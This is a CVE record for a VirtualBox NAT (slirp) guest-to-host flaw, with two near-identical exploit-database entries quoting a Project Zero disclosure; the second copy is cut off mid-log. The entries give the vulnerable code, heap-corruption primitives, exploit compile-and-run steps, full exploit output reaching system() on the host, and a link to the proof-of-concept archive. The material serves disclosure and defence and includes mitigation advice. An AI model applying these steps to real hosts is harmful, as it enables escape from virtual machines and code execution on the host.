ID CVE-2017-3558 Type cve Reporter cve@mitre.org Modified 2019-10-03T00:03:00
Description
Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.0.38 and Prior to 5.1.20. Easily "exploitable" vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 8.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).
{"exploitdb": [{"lastseen": "2018-11-30T12:32:47", "bulletinFamily": "exploit", "description": "", "modified": "2017-04-20T00:00:00", "published": "2017-04-20T00:00:00", "id": "EDB-ID:41904", "href": "https://www.exploit-db.com/exploits/41904", "type": "exploitdb", "title": "Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1086\r\n\r\nThere is a vulnerability in VirtualBox that permits an attacker with\r\nroot privileges in a virtual machine with a NAT network interface to\r\ncorrupt the memory of the userspace host process and leak memory\r\ncontents from the userspace host process. This probably permits an\r\nattacker with root privileges inside the guest to execute arbitrary\r\ncode in userspace context on the host.\r\n\r\nThe issue is in the copy of slirp that is shipped in VirtualBox, in\r\nthe function ip_input() in src/VBox/Devices/Network/slirp/ip_input.c:\r\n\r\nvoid\r\nip_input(PNATState pData, struct mbuf *m)\r\n{\r\n register struct ip *ip;\r\n [...]\r\n ip = mtod(m, struct ip *);\r\n [...]\r\n {\r\n [...]\r\n /*\r\n * XXX: TODO: this is most likely a leftover spooky action at\r\n * a distance from alias_dns.c host resolver code and can be\r\n * g/c'ed.\r\n */\r\n if (m->m_len != RT_N2H_U16(ip->ip_len))\r\n m->m_len = RT_N2H_U16(ip->ip_len);\r\n }\r\n [...]\r\n}\r\n\r\nThis code does not seem to be present in the upstream version of\r\nslirp.\r\n\r\nThe assignment `m->m_len = RT_N2H_U16(ip->ip_len)` overwrites the\r\ntrusted length field `m_len` of the buffer `m` with the untrusted\r\nlength field in the IP header of the received packet. At this point,\r\nthe IP header has not been validated at all. All following code that\r\nprocesses packets relies on the correctness of `m->m_len`, so by\r\nsending an IP header with a bogus length field, an attacker can cause\r\nall following code to operate on out-of-bounds data.\r\n\r\nIn particular, an attacker can use this bug to obtain the following\r\nattack primitives:\r\n\r\n - The attacker can leak out-of-bounds heap data by sending a UDP\r\n packet to a host on the internet with checksum 0 and a bogus length\r\n field in the IP header.\r\n The host process will send a (possibly fragmented) UDP packet to\r\n the specified host on the internet that includes out-of-bounds heap\r\n data.\r\n This method requires a cooperating host on the internet that the VM\r\n can talk to using the NAT network interface.\r\n - The attacker can leak out-of-bounds heap data by sending an ICMP\r\n Echo Request with a bogus length field in the IP header\r\n to the CTL_DNS address. The VM host then responds with an ICMP Echo\r\n Reply that includes out-of-bounds heap data.\r\n This approach has the advantage of not requiring a cooperating,\r\n reachable server on the internet, but has the disadvantage that\r\n the attacker needs to guess the 16-bit ICMP checksum.\r\n - The attacker can corrupt the heap by sending a UDP packet with a\r\n bogus length whose IP header contains IP options. The host process\r\n will then attempt to strip the IP headers via ip_input -> udp_input\r\n -> ip_stripoptions -> memcpy, which moves the IP payload - including\r\n out-of-bounds heap data - to a lower address. This can\r\n in particular be abused to overwrite a slirp heap chunk header\r\n (struct item) with attacker-controlled packet data.\r\n\r\nI have attached a crash PoC. Copy it into a VM whose only network\r\ninterface is a NAT interface, compile it with\r\n\"gcc -o crasher crasher.c\" and run it with \"sudo ./crasher\". The VM\r\nshould die after a few seconds, with something like this appearing in\r\ndmesg on the host:\r\n\r\n[107463.674598] traps: EMT-0[66638] general protection ip:7fc6a26076e8 sp:7fc6d2e27ad0 error:0 in VBoxDD.so[7fc6a24e2000+36d000]\r\n\r\nI have tested my crasher in VirtualBox version \"5.1.14 r112924\".\r\n\r\nThe bug was introduced in SVN revision\r\n<https://www.virtualbox.org/changeset/23155/vbox>.\r\n\r\n################################################################################\r\n\r\nWithout modifications,\r\nthe exploit should work under the following conditions:\r\n\r\n - host runs Ubuntu 14.04 (trusty), 64-bit\r\n - host uses libc6 package version 2.19-0ubuntu6.9 (most recent\r\n version)\r\n - VirtualBox version is 5.1.14~112924~Ubuntu~trusty (official build)\r\n (most recent version)\r\n - guest runs Linux\r\n - main network interface of the VM is a NAT interface (default\r\n config)\r\n\r\nThe exploit is able to run an arbitrary shell command on the host\r\nsystem. The command is hardcoded to \"id > /tmp/owned_from_guest\".\r\n\r\n\r\nSome things about the exploit that might be of interest to you:\r\n\r\nThe exploit operates on memory that belongs to the zone zone_clust of\r\nthe UMA heap.\r\nThe UMA heap is relatively easy to attack, partly because the sanity\r\nchecks are compiled out in userland code in release builds. For\r\nexample, the check\r\n`Assert((zone->magic == ZONE_MAGIC && zone == it->zone))` in\r\numa_zfree_arg() becomes a no-op, and the LIST_CHECKs in LIST_REMOVE()\r\nhave no effect. In particular, because the `zone == it->zone`\r\nassertion is not compiled into release builds, an attacker who can\r\noverwrite an item header and point its member ->zone to a controlled\r\nmemory area can cause an arbitrary function it->zone->pfFini to be\r\ncalled when the item whose header was overwritten is freed.\r\nIt might make sense to turn assertions in the allocator into something\r\nthat is also active in release builds.\r\n\r\nFor exploiting the bug, it was very helpful that the VirtualBox binary\r\nis built as non-relocatable, meaning that the binary is always loaded\r\nat the same virtual address. The exploit uses a hardcoded address to\r\nleak the contents of the GOT (global offset table), which can then be\r\nused to locate the addresses of libc functions.\r\nIt's probably a good idea to build the VirtualBox binaries as\r\nrelocatable code to prevent attacks from simply using\r\nhardcoded addresses - and this mitigation is pretty simple to\r\nimplement, you just have to add some compiler flags (`-pie -fPIE`\r\nor so). To verify that it's working, run VirtualBox, then as root,\r\ngrep the contents of /proc/{pid of VirtualBox}/maps for VirtualBox and\r\nverify that the mappings don't have low ranges like 00400000-00408000,\r\nbut use high addresses like 7ffb0f62e000 instead.\r\n\r\nAs far as I can tell from the source, on a Linux or Mac host, an\r\nattacker who has compromised the VM host process can also run\r\narbitrary code in the host kernel using the ioctls SUP_IOCTL_LDR_OPEN\r\nand SUP_IOCTL_LDR_LOAD. If that is indeed the case, it might make\r\nsense to reduce the privileges of the userland host code by\r\nsandboxing components like the shared folder host and the NAT\r\nimplementation and/or by rearchitecting VirtualBox so that the host\r\nkernel doesn't trust the host userland binary.\r\n\r\n\r\nTo reproduce the bug with the attached exploit:\r\n\r\n - On the host or some other box on the internet, compile and run the\r\n helper:\r\n\r\n $ gcc -o helper helper.c -Wall\r\n $ ./helper \r\n\r\n - In the guest, compile the exploit:\r\n\r\n # gcc -o bcs bcs.c -Wall -std=gnu99\r\n\r\n (This may throw some harmless format string warnings depending on\r\n whether the guest is 64-bit.)\r\n\r\n - To improve reliability, ensure that the guest isn't\r\n running any network services or clients, save the guest VM and\r\n restore it. (Saving and restoring the guest resets the Slirp heap.)\r\n\r\n - In the guest, as root, run the exploit. Pass the helper host's IP\r\n address as argument.\r\n\r\n # ./bcs xxx.xxx.xxx.xxx\r\n\r\n - If the exploit was successful, there should be a new file\r\n \"/tmp/owned_from_guest\" on the host that contains the output of the\r\n \"id\" command.\r\n\r\nA successful run of the exploit should look like this:\r\n\r\n==================================================================\r\n# ./bcs {censored}\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* dev \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\nenp0s3\r\n================================\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* src \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\n10.0.2.15\r\n================================\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* via \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\n10.0.2.2\r\n================================\r\nsystemf: <<<ping -c3 -w4 10.0.2.2>>>\r\nPING 10.0.2.2 (10.0.2.2) 56(84) bytes of data.\r\n64 bytes from 10.0.2.2: icmp_seq=2 ttl=64 time=0.375 ms\r\n64 bytes from 10.0.2.2: icmp_seq=3 ttl=64 time=0.277 ms\r\n64 bytes from 10.0.2.2: icmp_seq=4 ttl=64 time=0.297 ms\r\n\r\n--- 10.0.2.2 ping statistics ---\r\n4 packets transmitted, 3 received, 25% packet loss, time 3054ms\r\nrtt min/avg/max/mdev = 0.277/0.316/0.375/0.044 ms\r\n\r\n================================\r\nsystemf: <<<arp -s 10.0.2.2 01:23:45:67:89:ab>>>\r\nsystemf: <<<iptables -I OUTPUT -o enp0s3 -j DROP>>>\r\ndefragging...\r\ndefragged\r\ntrying to leak...\r\n\r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 58 3e 26 35 56 7f 00 00 |........X>&5V...|\r\n00000020 18 2e 26 35 56 7f 00 00 |..&5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f5635263e58\r\nprev: 0x7f5635262e00\r\ndefragging...\r\ndefragged\r\nplaced shell command at 0x7f5635263676\r\nfreelist head at 0x7f5648b4e690\r\ntrying to leak...\r\n\r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 a0 ec 25 35 56 7f 00 00 |..........%5V...|\r\n00000020 60 dc 25 35 56 7f 00 00 |`.%5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f563525eca0\r\nprev: 0x7f563525dc48\r\ndefragging...\r\ndefragged\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525fd42, fake_zone at 0x7f563525fd4a\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525f516, fake_zone at 0x7f563525f51e\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525ecea, fake_zone at 0x7f563525ecf2\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525e4be, fake_zone at 0x7f563525e4c6\r\nsend_udp_datashift(shift_amount=40, data_length=9368)\r\nsend_udp_datashift(shift_amount=36, data_length=9368)\r\nsending packet2, ip_off=0x28, ip_id=0x1a\r\ntrying to leak GOT from fake chunk...\r\n\r\ngot UDP, len=540\r\nleak_udp successful\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000200\r\ndefragging...\r\ndefragged\r\n\r\ngot UDP, len=540\r\nleak_udp successful\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n00000010 b0 09 c0 97 56 7f 00 00 b6 0f 40 00 00 00 00 00 |....V.....@.....|\r\n00000020 10 9d c3 97 56 7f 00 00 a0 a0 c3 97 56 7f 00 00 |....V.......V...|\r\n00000030 e6 0f 40 00 00 00 00 00 90 28 c7 97 56 7f 00 00 |..@......(..V...|\r\n00000040 20 9d c3 97 56 7f 00 00 e0 03 15 98 56 7f 00 00 | ...V.......V...|\r\n00000050 26 10 40 00 00 00 00 00 36 10 40 00 00 00 00 00 |&.@.....6.@.....|\r\n00000060 50 9e b9 97 56 7f 00 00 56 10 40 00 00 00 00 00 |P...V...V.@.....|\r\n00000070 80 30 c6 97 56 7f 00 00 10 fc c0 97 56 7f 00 00 |.0..V.......V...|\r\n00000080 86 10 40 00 00 00 00 00 96 10 40 00 00 00 00 00 |..@.......@.....|\r\n00000090 c0 fe c0 97 56 7f 00 00 80 2c c7 97 56 7f 00 00 |....V....,..V...|\r\n000000a0 d0 9f c3 97 56 7f 00 00 30 9d c3 97 56 7f 00 00 |....V...0...V...|\r\n000000b0 60 28 c7 97 56 7f 00 00 90 e0 f3 97 56 7f 00 00 |`(..V.......V...|\r\n000000c0 70 c8 c6 97 56 7f 00 00 16 11 40 00 00 00 00 00 |p...V.....@.....|\r\n000000d0 30 0c c8 97 56 7f 00 00 a0 c8 c6 97 56 7f 00 00 |0...V.......V...|\r\n000000e0 60 c9 c6 97 56 7f 00 00 d0 0b 15 98 56 7f 00 00 |`...V.......V...|\r\n000000f0 66 11 40 00 00 00 00 00 76 11 40 00 00 00 00 00 |f.@.....v.@.....|\r\n00000100 86 11 40 00 00 00 00 00 96 11 40 00 00 00 00 00 |..@.......@.....|\r\n00000110 50 e1 f3 97 56 7f 00 00 b6 11 40 00 00 00 00 00 |P...V.....@.....|\r\n00000120 c6 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 |..@.............|\r\n00000130 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|\r\n00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000160 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 |................|\r\n00000170 00 00 00 00 22 05 08 20 00 20 00 00 88 13 00 00 |....\".. . ......|\r\n00000180 81 cb 05 00 02 00 00 00 b9 4b 40 00 00 00 00 00 |.........K@.....|\r\n00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n000001a0 00 00 00 00 00 00 00 00 2f 75 73 72 2f 6c 69 62 |......../usr/lib|\r\n000001b0 2f 76 69 72 74 75 61 6c 62 6f 78 00 56 69 72 74 |/virtualbox.Virt|\r\n000001c0 75 61 6c 42 6f 78 00 00 00 00 00 00 00 00 00 00 |ualBox..........|\r\n000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000200\r\nstrlen at 0x7f5697c009b0\r\nsystem() at 0x7f5697bbe590\r\ncalling system()...\r\ndefragging...\r\ndefragged\r\ntrying to leak...\r\n\r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 84 cd 0f 35 56 7f 00 00 |...........5V...|\r\n00000020 44 bd 0f 35 56 7f 00 00 |D..5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f56350fcd84\r\nprev: 0x7f56350fbd2c\r\ndefragging...\r\ndefragged\r\nfake zone packet item at 0x7f56350fc558, dummy_next at 0x7f56350fc5a2, fake_zone at 0x7f56350fc5aa\r\nsend_udp_datashift(shift_amount=40, data_length=3092)\r\nsend_udp_datashift(shift_amount=36, data_length=3092)\r\nsending packet2, ip_off=0xa, ip_id=0x27\r\ndid that work?\r\nsystemf: <<<iptables -D OUTPUT -o enp0s3 -j DROP>>>\r\n==================================================================\r\n\r\nIf the exploit crashes, you'll have to remove the firewall rule the\r\nexploit added with `iptables -D OUTPUT -o {interface} -j DROP` inside\r\nthe VM to restore network connectivity.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41904.zip", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41904"}], "zdt": [{"lastseen": "2018-04-14T01:52:01", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-04-21T00:00:00", "published": "2017-04-21T00:00:00", "href": "https://0day.today/exploit/description/27646", "id": "1337DAY-ID-27646", "type": "zdt", "title": "VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy Exploit", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1086\r\n \r\nThere is a vulnerability in VirtualBox that permits an attacker with\r\nroot privileges in a virtual machine with a NAT network interface to\r\ncorrupt the memory of the userspace host process and leak memory\r\ncontents from the userspace host process. This probably permits an\r\nattacker with root privileges inside the guest to execute arbitrary\r\ncode in userspace context on the host.\r\n \r\nThe issue is in the copy of slirp that is shipped in VirtualBox, in\r\nthe function ip_input() in src/VBox/Devices/Network/slirp/ip_input.c:\r\n \r\nvoid\r\nip_input(PNATState pData, struct mbuf *m)\r\n{\r\n register struct ip *ip;\r\n [...]\r\n ip = mtod(m, struct ip *);\r\n [...]\r\n {\r\n [...]\r\n /*\r\n * XXX: TODO: this is most likely a leftover spooky action at\r\n * a distance from alias_dns.c host resolver code and can be\r\n * g/c'ed.\r\n */\r\n if (m->m_len != RT_N2H_U16(ip->ip_len))\r\n m->m_len = RT_N2H_U16(ip->ip_len);\r\n }\r\n [...]\r\n}\r\n \r\nThis code does not seem to be present in the upstream version of\r\nslirp.\r\n \r\nThe assignment `m->m_len = RT_N2H_U16(ip->ip_len)` overwrites the\r\ntrusted length field `m_len` of the buffer `m` with the untrusted\r\nlength field in the IP header of the received packet. At this point,\r\nthe IP header has not been validated at all. All following code that\r\nprocesses packets relies on the correctness of `m->m_len`, so by\r\nsending an IP header with a bogus length field, an attacker can cause\r\nall following code to operate on out-of-bounds data.\r\n \r\nIn particular, an attacker can use this bug to obtain the following\r\nattack primitives:\r\n \r\n - The attacker can leak out-of-bounds heap data by sending a UDP\r\n packet to a host on the internet with checksum 0 and a bogus length\r\n field in the IP header.\r\n The host process will send a (possibly fragmented) UDP packet to\r\n the specified host on the internet that includes out-of-bounds heap\r\n data.\r\n This method requires a cooperating host on the internet that the VM\r\n can talk to using the NAT network interface.\r\n - The attacker can leak out-of-bounds heap data by sending an ICMP\r\n Echo Request with a bogus length field in the IP header\r\n to the CTL_DNS address. The VM host then responds with an ICMP Echo\r\n Reply that includes out-of-bounds heap data.\r\n This approach has the advantage of not requiring a cooperating,\r\n reachable server on the internet, but has the disadvantage that\r\n the attacker needs to guess the 16-bit ICMP checksum.\r\n - The attacker can corrupt the heap by sending a UDP packet with a\r\n bogus length whose IP header contains IP options. The host process\r\n will then attempt to strip the IP headers via ip_input -> udp_input\r\n -> ip_stripoptions -> memcpy, which moves the IP payload - including\r\n out-of-bounds heap data - to a lower address. This can\r\n in particular be abused to overwrite a slirp heap chunk header\r\n (struct item) with attacker-controlled packet data.\r\n \r\nI have attached a crash PoC. Copy it into a VM whose only network\r\ninterface is a NAT interface, compile it with\r\n\"gcc -o crasher crasher.c\" and run it with \"sudo ./crasher\". The VM\r\nshould die after a few seconds, with something like this appearing in\r\ndmesg on the host:\r\n \r\n[107463.674598] traps: EMT-0[66638] general protection ip:7fc6a26076e8 sp:7fc6d2e27ad0 error:0 in VBoxDD.so[7fc6a24e2000+36d000]\r\n \r\nI have tested my crasher in VirtualBox version \"5.1.14 r112924\".\r\n \r\nThe bug was introduced in SVN revision\r\n<https://www.virtualbox.org/changeset/23155/vbox>.\r\n \r\n################################################################################\r\n \r\nWithout modifications,\r\nthe exploit should work under the following conditions:\r\n \r\n - host runs Ubuntu 14.04 (trusty), 64-bit\r\n - host uses libc6 package version 2.19-0ubuntu6.9 (most recent\r\n version)\r\n - VirtualBox version is 5.1.14~112924~Ubuntu~trusty (official build)\r\n (most recent version)\r\n - guest runs Linux\r\n - main network interface of the VM is a NAT interface (default\r\n config)\r\n \r\nThe exploit is able to run an arbitrary shell command on the host\r\nsystem. The command is hardcoded to \"id > /tmp/owned_from_guest\".\r\n \r\n \r\nSome things about the exploit that might be of interest to you:\r\n \r\nThe exploit operates on memory that belongs to the zone zone_clust of\r\nthe UMA heap.\r\nThe UMA heap is relatively easy to attack, partly because the sanity\r\nchecks are compiled out in userland code in release builds. For\r\nexample, the check\r\n`Assert((zone->magic == ZONE_MAGIC && zone == it->zone))` in\r\numa_zfree_arg() becomes a no-op, and the LIST_CHECKs in LIST_REMOVE()\r\nhave no effect. In particular, because the `zone == it->zone`\r\nassertion is not compiled into release builds, an attacker who can\r\noverwrite an item header and point its member ->zone to a controlled\r\nmemory area can cause an arbitrary function it->zone->pfFini to be\r\ncalled when the item whose header was overwritten is freed.\r\nIt might make sense to turn assertions in the allocator into something\r\nthat is also active in release builds.\r\n \r\nFor exploiting the bug, it was very helpful that the VirtualBox binary\r\nis built as non-relocatable, meaning that the binary is always loaded\r\nat the same virtual address. The exploit uses a hardcoded address to\r\nleak the contents of the GOT (global offset table), which can then be\r\nused to locate the addresses of libc functions.\r\nIt's probably a good idea to build the VirtualBox binaries as\r\nrelocatable code to prevent attacks from simply using\r\nhardcoded addresses - and this mitigation is pretty simple to\r\nimplement, you just have to add some compiler flags (`-pie -fPIE`\r\nor so). To verify that it's working, run VirtualBox, then as root,\r\ngrep the contents of /proc/{pid of VirtualBox}/maps for VirtualBox and\r\nverify that the mappings don't have low ranges like 00400000-00408000,\r\nbut use high addresses like 7ffb0f62e000 instead.\r\n \r\nAs far as I can tell from the source, on a Linux or Mac host, an\r\nattacker who has compromised the VM host process can also run\r\narbitrary code in the host kernel using the ioctls SUP_IOCTL_LDR_OPEN\r\nand SUP_IOCTL_LDR_LOAD. If that is indeed the case, it might make\r\nsense to reduce the privileges of the userland host code by\r\nsandboxing components like the shared folder host and the NAT\r\nimplementation and/or by rearchitecting VirtualBox so that the host\r\nkernel doesn't trust the host userland binary.\r\n \r\n \r\nTo reproduce the bug with the attached exploit:\r\n \r\n - On the host or some other box on the internet, compile and run the\r\n helper:\r\n \r\n $ gcc -o helper helper.c -Wall\r\n $ ./helper \r\n \r\n - In the guest, compile the exploit:\r\n \r\n # gcc -o bcs bcs.c -Wall -std=gnu99\r\n \r\n (This may throw some harmless format string warnings depending on\r\n whether the guest is 64-bit.)\r\n \r\n - To improve reliability, ensure that the guest isn't\r\n running any network services or clients, save the guest VM and\r\n restore it. (Saving and restoring the guest resets the Slirp heap.)\r\n \r\n - In the guest, as root, run the exploit. Pass the helper host's IP\r\n address as argument.\r\n \r\n # ./bcs xxx.xxx.xxx.xxx\r\n \r\n - If the exploit was successful, there should be a new file\r\n \"/tmp/owned_from_guest\" on the host that contains the output of the\r\n \"id\" command.\r\n \r\nA successful run of the exploit should look like this:\r\n \r\n==================================================================\r\n# ./bcs {censored}\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* dev \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\nenp0s3\r\n================================\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* src \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\n10.0.2.15\r\n================================\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* via \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\n10.0.2.2\r\n================================\r\nsystemf: <<<ping -c3 -w4 10.0.2.2>>>\r\nPING 10.0.2.2 (10.0.2.2) 56(84) bytes of data.\r\n64 bytes from 10.0.2.2: icmp_seq=2 ttl=64 time=0.375 ms\r\n64 bytes from 10.0.2.2: icmp_seq=3 ttl=64 time=0.277 ms\r\n64 bytes from 10.0.2.2: icmp_seq=4 ttl=64 time=0.297 ms\r\n \r\n--- 10.0.2.2 ping statistics ---\r\n4 packets transmitted, 3 received, 25% packet loss, time 3054ms\r\nrtt min/avg/max/mdev = 0.277/0.316/0.375/0.044 ms\r\n \r\n================================\r\nsystemf: <<<arp -s 10.0.2.2 01:23:45:67:89:ab>>>\r\nsystemf: <<<iptables -I OUTPUT -o enp0s3 -j DROP>>>\r\ndefragging...\r\ndefragged\r\ntrying to leak...\r\n \r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 58 3e 26 35 56 7f 00 00 |........X>&5V...|\r\n00000020 18 2e 26 35 56 7f 00 00 |..&5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f5635263e58\r\nprev: 0x7f5635262e00\r\ndefragging...\r\ndefragged\r\nplaced shell command at 0x7f5635263676\r\nfreelist head at 0x7f5648b4e690\r\ntrying to leak...\r\n \r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 a0 ec 25 35 56 7f 00 00 |..........%5V...|\r\n00000020 60 dc 25 35 56 7f 00 00 |`.%5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f563525eca0\r\nprev: 0x7f563525dc48\r\ndefragging...\r\ndefragged\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525fd42, fake_zone at 0x7f563525fd4a\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525f516, fake_zone at 0x7f563525f51e\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525ecea, fake_zone at 0x7f563525ecf2\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525e4be, fake_zone at 0x7f563525e4c6\r\nsend_udp_datashift(shift_amount=40, data_length=9368)\r\nsend_udp_datashift(shift_amount=36, data_length=9368)\r\nsending packet2, ip_off=0x28, ip_id=0x1a\r\ntrying to leak GOT from fake chunk...\r\n \r\ngot UDP, len=540\r\nleak_udp successful\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000200\r\ndefragging...\r\ndefragged\r\n \r\ngot UDP, len=540\r\nleak_udp successful\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n00000010 b0 09 c0 97 56 7f 00 00 b6 0f 40 00 00 00 00 00 |[email\u00a0protected]|\r\n00000020 10 9d c3 97 56 7f 00 00 a0 a0 c3 97 56 7f 00 00 |....V.......V...|\r\n00000030 e6 0f 40 00 00 00 00 00 90 28 c7 97 56 7f 00 00 |[email\u00a0protected](..V...|\r\n00000040 20 9d c3 97 56 7f 00 00 e0 03 15 98 56 7f 00 00 | ...V.......V...|\r\n00000050 26 10 40 00 00 00 00 00 36 10 40 00 00 00 00 00 |&[email\u00a0protected]@.....|\r\n00000060 50 9e b9 97 56 7f 00 00 56 10 40 00 00 00 00 00 |[email\u00a0protected]|\r\n00000070 80 30 c6 97 56 7f 00 00 10 fc c0 97 56 7f 00 00 |.0..V.......V...|\r\n00000080 86 10 40 00 00 00 00 00 96 10 40 00 00 00 00 00 |[email\u00a0protected]@.....|\r\n00000090 c0 fe c0 97 56 7f 00 00 80 2c c7 97 56 7f 00 00 |....V....,..V...|\r\n000000a0 d0 9f c3 97 56 7f 00 00 30 9d c3 97 56 7f 00 00 |....V...0...V...|\r\n000000b0 60 28 c7 97 56 7f 00 00 90 e0 f3 97 56 7f 00 00 |`(..V.......V...|\r\n000000c0 70 c8 c6 97 56 7f 00 00 16 11 40 00 00 00 00 00 |[email\u00a0protected]|\r\n000000d0 30 0c c8 97 56 7f 00 00 a0 c8 c6 97 56 7f 00 00 |0...V.......V...|\r\n000000e0 60 c9 c6 97 56 7f 00 00 d0 0b 15 98 56 7f 00 00 |`...V.......V...|\r\n000000f0 66 11 40 00 00 00 00 00 76 11 40 00 00 00 00 00 |[email\u00a0protected]@.....|\r\n00000100 86 11 40 00 00 00 00 00 96 11 40 00 00 00 00 00 |[email\u00a0protected]@.....|\r\n00000110 50 e1 f3 97 56 7f 00 00 b6 11 40 00 00 00 00 00 |[email\u00a0protected]|\r\n00000120 c6 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 |[email\u00a0protected]|\r\n00000130 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|\r\n00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000160 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 |................|\r\n00000170 00 00 00 00 22 05 08 20 00 20 00 00 88 13 00 00 |....\".. . ......|\r\n00000180 81 cb 05 00 02 00 00 00 b9 4b 40 00 00 00 00 00 |[email\u00a0protected]|\r\n00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n000001a0 00 00 00 00 00 00 00 00 2f 75 73 72 2f 6c 69 62 |......../usr/lib|\r\n000001b0 2f 76 69 72 74 75 61 6c 62 6f 78 00 56 69 72 74 |/virtualbox.Virt|\r\n000001c0 75 61 6c 42 6f 78 00 00 00 00 00 00 00 00 00 00 |ualBox..........|\r\n000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000200\r\nstrlen at 0x7f5697c009b0\r\nsystem() at 0x7f5697bbe590\r\ncalling system()...\r\ndefragging...\r\ndefragged\r\ntrying to leak...\r\n \r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 84 cd 0f 35 56 7f 00 00 |...........5V...|\r\n00000020 44 bd 0f 35 56 7f 00 00 |D..5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f56350fcd84\r\nprev: 0x7f56350fbd2c\r\ndefragging...\r\ndefragged\r\nfake zone packet item at 0x7f56350fc558, dummy_next at 0x7f56350fc5a2, fake_zone at 